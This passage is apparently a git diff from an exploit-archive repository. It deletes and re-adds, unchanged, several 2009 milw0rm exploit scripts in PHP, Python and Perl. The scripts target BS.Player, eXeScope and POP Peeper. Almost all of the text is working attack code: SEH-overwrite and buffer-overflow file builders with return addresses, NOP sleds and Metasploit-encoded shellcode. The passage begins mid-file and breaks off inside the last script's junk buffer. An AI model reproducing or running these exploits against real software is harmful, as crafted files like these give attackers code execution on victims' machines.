-"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x59\x79\x4b\x4c\x69".
-"\x78\x37\x34\x67\x70\x45\x50\x75\x50\x6c\x4b\x61\x55\x45\x6c\x6e".
-"\x6b\x71\x6c\x73\x35\x62\x58\x66\x61\x6a\x4f\x4c\x4b\x42\x6f\x56".
-"\x78\x4c\x4b\x71\x4f\x77\x50\x57\x71\x6a\x4b\x72\x69\x6e\x6b\x75".
-"\x64\x4e\x6b\x75\x51\x68\x6e\x30\x31\x59\x50\x4d\x49\x4c\x6c\x4f".
-"\x74\x69\x50\x31\x64\x36\x67\x4f\x31\x4a\x6a\x44\x4d\x75\x51\x68".
-"\x42\x38\x6b\x5a\x54\x35\x6b\x62\x74\x75\x74\x37\x74\x70\x75\x68".
-"\x65\x4c\x4b\x51\x4f\x35\x74\x73\x31\x4a\x4b\x50\x66\x6c\x4b\x44".
-"\x4c\x50\x4b\x6c\x4b\x41\x4f\x77\x6c\x34\x41\x7a\x4b\x6c\x4b\x67".
-"\x6c\x6e\x6b\x37\x71\x6a\x4b\x4d\x59\x33\x6c\x71\x34\x54\x44\x39".
-"\x53\x55\x61\x6f\x30\x41\x74\x6c\x4b\x37\x30\x70\x30\x6e\x65\x4b".
-"\x70\x61\x68\x66\x6c\x6e\x6b\x61\x50\x36\x6c\x6e\x6b\x74\x30\x65".
-"\x4c\x6e\x4d\x6c\x4b\x71\x78\x64\x48\x68\x6b\x76\x69\x6c\x4b\x4f".
-"\x70\x48\x30\x75\x50\x75\x50\x55\x50\x4e\x6b\x63\x58\x67\x4c\x31".
-"\x4f\x56\x51\x4a\x56\x53\x50\x41\x46\x4f\x79\x4b\x48\x4b\x33\x39".
-"\x50\x61\x6b\x32\x70\x53\x58\x6c\x30\x4c\x4a\x65\x54\x53\x6f\x63".
-"\x58\x7a\x38\x49\x6e\x4e\x6a\x54\x4e\x70\x57\x69\x6f\x58\x67\x62".
-"\x43\x72\x41\x70\x6c\x70\x63\x43\x30\x47";
-
-$buffer.=$jnk.$jmp.$seh.$nop4.$scode;
-$buffer.=
-"x56\x37\x2e\x46\x4d\x2f\x6c\x69\x73\x74\x65\x6e\x2e\x70".
-"\x6c\x73\x0d\x0a\x00";
-
-$fp=fopen("evil.bsl","w+");
-if (!$fp) {die("cannot create evil.bsl!");}
-@fputs($fp,$buffer);
-@fclose($fp);
-?>
-
-# milw0rm.com [2009-03-20]
+<?php
+/*
+Bs.Player <= 2.34 Build 980 (.bsl) local buffer overflow 0day exploit (seh)
+by Nine:Situations:Group::pyrokinesis
+
+Overlong hostnames in bsplayer playlist files causes eax and seh handlers to be
+overwritten. Cannot reliably debug with olly because of code compression, just
+used faultmon/memdump/msfpescan and I choosed the easy/universal way with seh.
+There are some pop ret addresses in common among the vulnerable versions...
+
+Well it says local but I consider it a remote one because .bsl files are
+associated to the program
+Tested and working against:
+
+...
+v2.32 Build 975 Free
+v2.34 Build 980 PRO
+win xp pro sp2 / sp3
+win 2k3 sp1
+
+not vulnerable:
+v2.35 Build 985 PRO
+V2.36 Build 990 Free/Pro
+
+
+*/
+$buffer=
+"\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x23\x45\x58\x54\x49\x4e\x46".
+"\x3a\x30\x2c\x41\x41\x41\x41\x0d\x0a\x68\x74\x74\x70\x3a\x2f\x2f".
+"\x52\x61\x77\x2d\x48\x69\x67\x68\x2e";
+
+$nop1=str_repeat("\x90",384);
+$eax_again="BBBB";
+$nop2=str_repeat("\x90",12);
+$eax="CCCC";
+$nop3=str_repeat("\x90",8);
+$jnk=$nop1.$eax_again.$nop2.$eax.$nop3;
+
+$jmp="\xeb\x08\x90\x90";
+
+$seh="\xb1\xad\x41\x00"; //0x0041adb1   pop pop ret bsplayer.exe
+
+$nop4=str_repeat("\x90",100);
+
+// win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
+$scode=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
+"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x47".
+"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x57\x32\x42\x42\x42\x32".
+"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x59\x79\x4b\x4c\x69".
+"\x78\x37\x34\x67\x70\x45\x50\x75\x50\x6c\x4b\x61\x55\x45\x6c\x6e".
+"\x6b\x71\x6c\x73\x35\x62\x58\x66\x61\x6a\x4f\x4c\x4b\x42\x6f\x56".
+"\x78\x4c\x4b\x71\x4f\x77\x50\x57\x71\x6a\x4b\x72\x69\x6e\x6b\x75".
+"\x64\x4e\x6b\x75\x51\x68\x6e\x30\x31\x59\x50\x4d\x49\x4c\x6c\x4f".
+"\x74\x69\x50\x31\x64\x36\x67\x4f\x31\x4a\x6a\x44\x4d\x75\x51\x68".
+"\x42\x38\x6b\x5a\x54\x35\x6b\x62\x74\x75\x74\x37\x74\x70\x75\x68".
+"\x65\x4c\x4b\x51\x4f\x35\x74\x73\x31\x4a\x4b\x50\x66\x6c\x4b\x44".
+"\x4c\x50\x4b\x6c\x4b\x41\x4f\x77\x6c\x34\x41\x7a\x4b\x6c\x4b\x67".
+"\x6c\x6e\x6b\x37\x71\x6a\x4b\x4d\x59\x33\x6c\x71\x34\x54\x44\x39".
+"\x53\x55\x61\x6f\x30\x41\x74\x6c\x4b\x37\x30\x70\x30\x6e\x65\x4b".
+"\x70\x61\x68\x66\x6c\x6e\x6b\x61\x50\x36\x6c\x6e\x6b\x74\x30\x65".
+"\x4c\x6e\x4d\x6c\x4b\x71\x78\x64\x48\x68\x6b\x76\x69\x6c\x4b\x4f".
+"\x70\x48\x30\x75\x50\x75\x50\x55\x50\x4e\x6b\x63\x58\x67\x4c\x31".
+"\x4f\x56\x51\x4a\x56\x53\x50\x41\x46\x4f\x79\x4b\x48\x4b\x33\x39".
+"\x50\x61\x6b\x32\x70\x53\x58\x6c\x30\x4c\x4a\x65\x54\x53\x6f\x63".
+"\x58\x7a\x38\x49\x6e\x4e\x6a\x54\x4e\x70\x57\x69\x6f\x58\x67\x62".
+"\x43\x72\x41\x70\x6c\x70\x63\x43\x30\x47";
+
+$buffer.=$jnk.$jmp.$seh.$nop4.$scode;
+$buffer.=
+"x56\x37\x2e\x46\x4d\x2f\x6c\x69\x73\x74\x65\x6e\x2e\x70".
+"\x6c\x73\x0d\x0a\x00";
+
+$fp=fopen("evil.bsl","w+");
+if (!$fp) {die("cannot create evil.bsl!");}
+@fputs($fp,$buffer);
+@fclose($fp);
+?>
+
+# milw0rm.com [2009-03-20]
diff --git a/platforms/windows/local/8251.py b/platforms/windows/local/8251.py
index 14b8690c5..b62d680e3 100755
--- a/platforms/windows/local/8251.py
+++ b/platforms/windows/local/8251.py
@@ -1,59 +1,59 @@
-#usage: exploit.py
-print "**************************************************************************"
-print " Bs.Player 2.34 (.bsl) Universal Seh Overwrite Exploit\n"
-print " Author : Nine:Situations:Group::pyrokinesis"
-print " Exploited by : His0k4"
-print " Tested on: Windows XP Pro SP2 Fr\n"
-print " Greetings to:"
-print " All friends & muslims HaCkers(dz)\n"
-print "**************************************************************************"
-         	
-			
-buff = "\x41" * 412
-
-next_seh = "\xEB\x12\x41\x41"
-
-seh = "\xD0\x26\x58\x02" # oldskin.dll
-
-nops = "\x90"*19
-
-header1= "\x68\x74\x74\x70\x3A\x2F\x2F\x52\x61\x77\x2D\x48\x69\x67\x68\x2E"
-header2= "\x2E\x46\x4D\x2F\x6C\x69\x73\x74\x65\x6E\x2E\x70\x6C\x73\x0A\x00"
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-shellcode = (
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
-"\x42\x50\x42\x30\x42\x30\x4b\x58\x45\x34\x4e\x33\x4b\x58\x4e\x37"
-"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x51\x4b\x58"
-"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x48"
-"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x33\x46\x55\x46\x52\x46\x50\x45\x37\x45\x4e\x4b\x58"
-"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x34"
-"\x4b\x58\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x53"
-"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x57"
-"\x4e\x50\x4b\x58\x42\x54\x4e\x30\x4b\x38\x42\x57\x4e\x41\x4d\x4a"
-"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b"
-"\x42\x50\x42\x50\x42\x50\x4b\x58\x4a\x46\x4e\x53\x4f\x35\x41\x33"
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57"
-"\x42\x35\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x46\x4a\x49"
-"\x50\x4f\x4c\x48\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x56\x41\x56"
-"\x4e\x46\x43\x46\x42\x30\x5a")
-
-	
-exploit = header1 + buff + next_seh + seh + nops + shellcode + header2
-
-try:
-    out_file = open("exploit.bsl",'w')
-    out_file.write(exploit)
-    out_file.close()
-    print "Exploit file created!\n"
-except:
-    print "Error"
-
-# milw0rm.com [2009-03-20]
+#usage: exploit.py
+print "**************************************************************************"
+print " Bs.Player 2.34 (.bsl) Universal Seh Overwrite Exploit\n"
+print " Author : Nine:Situations:Group::pyrokinesis"
+print " Exploited by : His0k4"
+print " Tested on: Windows XP Pro SP2 Fr\n"
+print " Greetings to:"
+print " All friends & muslims HaCkers(dz)\n"
+print "**************************************************************************"
+         	
+			
+buff = "\x41" * 412
+
+next_seh = "\xEB\x12\x41\x41"
+
+seh = "\xD0\x26\x58\x02" # oldskin.dll
+
+nops = "\x90"*19
+
+header1= "\x68\x74\x74\x70\x3A\x2F\x2F\x52\x61\x77\x2D\x48\x69\x67\x68\x2E"
+header2= "\x2E\x46\x4D\x2F\x6C\x69\x73\x74\x65\x6E\x2E\x70\x6C\x73\x0A\x00"
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+shellcode = (
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
+"\x42\x50\x42\x30\x42\x30\x4b\x58\x45\x34\x4e\x33\x4b\x58\x4e\x37"
+"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x51\x4b\x58"
+"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x48"
+"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x33\x46\x55\x46\x52\x46\x50\x45\x37\x45\x4e\x4b\x58"
+"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x34"
+"\x4b\x58\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x53"
+"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x57"
+"\x4e\x50\x4b\x58\x42\x54\x4e\x30\x4b\x38\x42\x57\x4e\x41\x4d\x4a"
+"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b"
+"\x42\x50\x42\x50\x42\x50\x4b\x58\x4a\x46\x4e\x53\x4f\x35\x41\x33"
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57"
+"\x42\x35\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x46\x4a\x49"
+"\x50\x4f\x4c\x48\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x56\x41\x56"
+"\x4e\x46\x43\x46\x42\x30\x5a")
+
+	
+exploit = header1 + buff + next_seh + seh + nops + shellcode + header2
+
+try:
+    out_file = open("exploit.bsl",'w')
+    out_file.write(exploit)
+    out_file.close()
+    print "Exploit file created!\n"
+except:
+    print "Error"
+
+# milw0rm.com [2009-03-20]
diff --git a/platforms/windows/local/8270.pl b/platforms/windows/local/8270.pl
index 5276e7ecf..29735f936 100755
--- a/platforms/windows/local/8270.pl
+++ b/platforms/windows/local/8270.pl
@@ -1,57 +1,57 @@
-#!/usr/bin/perl
-#
-# eXeScope 6.50 Local Buffer Overflow Exploit
-#
-# Download eXeScope 6.50 at:
-# http://hp.vector.co.jp/authors/VA003525/eXeSc650.zip
-#
-# Exploit by: Koshi ( heykoshi@gmail.com )
-# 
-
-use strict;
-use warnings;
-
-my $headers = 
-	"\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00".
-	"\xB8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB8\x00\x00\x00".
-	"\x0E\x1F\xBA\x0E\x00\xB4\x09\xCD\x21\xB8\x01\x4C\xCD\x21\x54\x68".
-	"\x69\x73\x20\x70\x72\x6F\x67\x72\x61\x6D\x20\x63\x61\x6E\x6E\x6F".
-	"\x74\x20\x62\x65\x20\x72\x75\x6E\x20\x65\x69\x74\x68\x65\x72\x20".
-	"\x77\x61\x79\x21\x21\x0D\x0D\x0A\x24\x00\x00\x00\x00\x00\x00\x00".
-	"\x8F\x8A\xF9\xDB\xCB\xEB\x97\x88\xCB\xEB\x97\x88\xCB\xEB\x97\x88".
-	"\x48\xF7\x99\x88\xCA\xEB\x97\x88\xA2\xF4\x9E\x88\xCA\xEB\x97\x88".
-	"\x22\xF4\x9A\x88\xCA\xEB\x97\x88\x52\x69\x63\x68\xCB\xEB\x97\x88".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4C\x01\xFF\x00".
-	"\xAB\xBA\x5C\x49\x00\x00\x00\x00\x00\x00\x00\x00\xE0\x00\xF0\x01".
-	"\x00"x224;
-
-
-# win32_exec -  EXITFUNC=process CMD=calc Size=161 Encoder=ShikataGaNai http://metasploit.com
-my $shellcode =
-	"\xb8\x82\x0a\x8d\x38\xd9\xc6\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x23".
-	"\x31\x42\x12\x83\xea\xfc\x03\xc0\x04\x6f\xcd\x38\xf0\x2b\x2e\xc0".
-	"\x01\x3f\x6b\xfc\x8a\x43\x71\x84\x8d\x54\xf2\x3b\x96\x21\x5a\xe3".
-	"\xa7\xde\x2c\x68\x93\xab\xae\x80\xed\x6b\x29\xf0\x8a\xac\x3e\x0f".
-	"\x52\xe6\xb2\x0e\x96\x1c\x38\x2b\x42\xc7\xc5\x3e\x8f\x8c\x99\xe4".
-	"\x4e\x78\x43\x6f\x5c\x35\x07\x30\x41\xc8\xfc\x45\x65\x41\x03\xb2".
-	"\x1f\x09\x20\x40\xe3\x83\xe8\x2c\x68\xa3\xd8\x29\xae\x5c\x15\xba".
-	"\x6f\x91\xae\xcc\x73\x04\x3b\x44\x84\xbd\x35\x1f\x14\xf1\x46\x1f".
-	"\x15\x79\x2e\x23\x4a\x4c\x59\x3b\x22\x27\x5d\x38\x0a\x4c\xce\x56".
-	"\xf5\x6b\x0c\xd5\x61\x14\x2f\x93\x7c\x73\x2f\x44\xe3\x1a\xa3\xe9".
-	"\xe4";
-
-my $buff0 = "A"x4148;
-my $eip   = "\x58\x32\x4D\x00"; # 004d3258 - eXeScope.exe
-my $sled  = "\x90"x20;
-my $len   = 6028 - length($shellcode);
-my $buff1 = "A"x$len;
-my $datas = $headers.$buff0.$eip.$sled.$shellcode.$buff1;
-
-open(my $files, "> example.exe");
-binmode $files;
-print $files $datas;
-close($files);
-
-# milw0rm.com [2009-03-23]
+#!/usr/bin/perl
+#
+# eXeScope 6.50 Local Buffer Overflow Exploit
+#
+# Download eXeScope 6.50 at:
+# http://hp.vector.co.jp/authors/VA003525/eXeSc650.zip
+#
+# Exploit by: Koshi ( heykoshi@gmail.com )
+# 
+
+use strict;
+use warnings;
+
+my $headers = 
+	"\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00".
+	"\xB8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB8\x00\x00\x00".
+	"\x0E\x1F\xBA\x0E\x00\xB4\x09\xCD\x21\xB8\x01\x4C\xCD\x21\x54\x68".
+	"\x69\x73\x20\x70\x72\x6F\x67\x72\x61\x6D\x20\x63\x61\x6E\x6E\x6F".
+	"\x74\x20\x62\x65\x20\x72\x75\x6E\x20\x65\x69\x74\x68\x65\x72\x20".
+	"\x77\x61\x79\x21\x21\x0D\x0D\x0A\x24\x00\x00\x00\x00\x00\x00\x00".
+	"\x8F\x8A\xF9\xDB\xCB\xEB\x97\x88\xCB\xEB\x97\x88\xCB\xEB\x97\x88".
+	"\x48\xF7\x99\x88\xCA\xEB\x97\x88\xA2\xF4\x9E\x88\xCA\xEB\x97\x88".
+	"\x22\xF4\x9A\x88\xCA\xEB\x97\x88\x52\x69\x63\x68\xCB\xEB\x97\x88".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4C\x01\xFF\x00".
+	"\xAB\xBA\x5C\x49\x00\x00\x00\x00\x00\x00\x00\x00\xE0\x00\xF0\x01".
+	"\x00"x224;
+
+
+# win32_exec -  EXITFUNC=process CMD=calc Size=161 Encoder=ShikataGaNai http://metasploit.com
+my $shellcode =
+	"\xb8\x82\x0a\x8d\x38\xd9\xc6\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x23".
+	"\x31\x42\x12\x83\xea\xfc\x03\xc0\x04\x6f\xcd\x38\xf0\x2b\x2e\xc0".
+	"\x01\x3f\x6b\xfc\x8a\x43\x71\x84\x8d\x54\xf2\x3b\x96\x21\x5a\xe3".
+	"\xa7\xde\x2c\x68\x93\xab\xae\x80\xed\x6b\x29\xf0\x8a\xac\x3e\x0f".
+	"\x52\xe6\xb2\x0e\x96\x1c\x38\x2b\x42\xc7\xc5\x3e\x8f\x8c\x99\xe4".
+	"\x4e\x78\x43\x6f\x5c\x35\x07\x30\x41\xc8\xfc\x45\x65\x41\x03\xb2".
+	"\x1f\x09\x20\x40\xe3\x83\xe8\x2c\x68\xa3\xd8\x29\xae\x5c\x15\xba".
+	"\x6f\x91\xae\xcc\x73\x04\x3b\x44\x84\xbd\x35\x1f\x14\xf1\x46\x1f".
+	"\x15\x79\x2e\x23\x4a\x4c\x59\x3b\x22\x27\x5d\x38\x0a\x4c\xce\x56".
+	"\xf5\x6b\x0c\xd5\x61\x14\x2f\x93\x7c\x73\x2f\x44\xe3\x1a\xa3\xe9".
+	"\xe4";
+
+my $buff0 = "A"x4148;
+my $eip   = "\x58\x32\x4D\x00"; # 004d3258 - eXeScope.exe
+my $sled  = "\x90"x20;
+my $len   = 6028 - length($shellcode);
+my $buff1 = "A"x$len;
+my $datas = $headers.$buff0.$eip.$sled.$shellcode.$buff1;
+
+open(my $files, "> example.exe");
+binmode $files;
+print $files $datas;
+close($files);
+
+# milw0rm.com [2009-03-23]
diff --git a/platforms/windows/local/8274.pl b/platforms/windows/local/8274.pl
index 9aac3a71f..2f77d12d8 100755
--- a/platforms/windows/local/8274.pl
+++ b/platforms/windows/local/8274.pl
@@ -1,67 +1,67 @@
- # POP Peeper 3.4.0.0 .eml file Universal SEH Overwrite Exploit
-# Exploit By Stack
-# Mountassif Moad
-# how to use file  Open message or Ctrl + O
-# Select The .eml file ......>>
-# BooM Calc Executed :d
-# Thnx Simo- SOft - Jadi - Str0ke
-# usage perl xpl.pl >>stack.eml
-my $mp=
-"\x4d\x41\x49\x4c\x20\x46\x52\x4f\x4d\x3a\x20\x53\x74\x61\x63\x6b".# Start first Header
-"\x20\x0d\x52\x43\x50\x54\x20\x54\x4f\x3a\x20\x20\x53\x74\x61".
-"\x63\x6b\x0d\x44\x41\x54\x41\x0d\x46\x52\x4f\x4d\x3a\x20". # End first Header
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". # Start Junk
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". # End Junk
-"\xeb\x06\x90\x90". # Next_Seh
-"\x4c\x51\x01\x10". # SEh ( Universal )
-"\x90\x90\x90\x90\x90\x90\x90\x90". # Start Nop
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90". # End Nop
-"\xeb\x03\x59\xeb". # Start Scode
-"\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56".
-"\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42".
-"\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44".
-"\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a".
-"\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44\x42\x50\x42\x50".
-"\x42\x30\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47\x45\x30\x4a\x57".
-"\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48\x4f\x55\x42\x52".
-"\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48\x41\x50\x50\x4e".
-"\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c\x46\x37\x47\x50".
-"\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e\x46\x4f\x4b\x53".
-"\x46\x55\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x38\x4f\x45\x46\x32".
-"\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54\x4b\x48\x4f\x45".
-"\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58\x41\x50\x4b\x4e".
-"\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43\x42\x4c\x46\x36".
-"\x4b\x58\x42\x34\x42\x33\x45\x48\x42\x4c\x4a\x57\x4e\x30\x4b\x48".
-"\x42\x44\x4e\x30\x4b\x48\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x4a\x46".
-"\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b\x42\x50\x42\x50".
-"\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x33\x48\x4f\x42\x36".
-"\x48\x45\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x47\x42\x55\x4a\x46".
-"\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x39\x50\x4f\x4c\x38".
-"\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x36\x4e\x56\x43\x36".
-"\x50\x32\x45\x36\x4a\x57\x45\x56\x42\x30\x5a". # End Scode
-"\x0d\x54\x4f\x3a". # Start Second Header
-"\x20\x53\x74\x61\x63\x6b\x20\x3a\x64\x20\x0d\x0d\x0d".
-"\x0d"; # End Second Header
-print $mp;
-
-# milw0rm.com [2009-03-23]
+ # POP Peeper 3.4.0.0 .eml file Universal SEH Overwrite Exploit
+# Exploit By Stack
+# Mountassif Moad
+# how to use file  Open message or Ctrl + O
+# Select The .eml file ......>>
+# BooM Calc Executed :d
+# Thnx Simo- SOft - Jadi - Str0ke
+# usage perl xpl.pl >>stack.eml
+my $mp=
+"\x4d\x41\x49\x4c\x20\x46\x52\x4f\x4d\x3a\x20\x53\x74\x61\x63\x6b".# Start first Header
+"\x20\x0d\x52\x43\x50\x54\x20\x54\x4f\x3a\x20\x20\x53\x74\x61".
+"\x63\x6b\x0d\x44\x41\x54\x41\x0d\x46\x52\x4f\x4d\x3a\x20". # End first Header
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". # Start Junk
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
